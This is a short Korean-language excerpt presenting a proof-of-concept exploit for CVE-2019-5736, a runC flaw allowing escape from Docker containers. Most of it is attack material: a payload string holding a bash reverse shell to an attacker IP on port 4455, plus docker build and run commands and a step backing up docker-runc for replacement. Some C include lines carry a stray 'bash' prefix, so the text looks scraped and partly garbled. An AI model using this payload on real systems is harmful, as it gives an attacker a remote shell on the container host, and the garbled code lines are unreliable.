
CVE-2019-5736에 대한 개념 증명 익스플로잇으로, runC 취약점을 통한 Docker 컨테이너 탈출 및 리버스 셸 페이로드 주입을 시연합니다.
bash #include <string.h>
bash #include <unistd.h>
bash const char *poc = "#!/bin/bash\n/bin/bash -i >& /dev/tcp/<공격 PC IP>/4455 0>&1 &\n";
$ docker build -t cve .
$ docker run -t -d --name cvetest cve
$ sudo cp /usr/bin/docker-runc /usr/bin/docker-runc.bak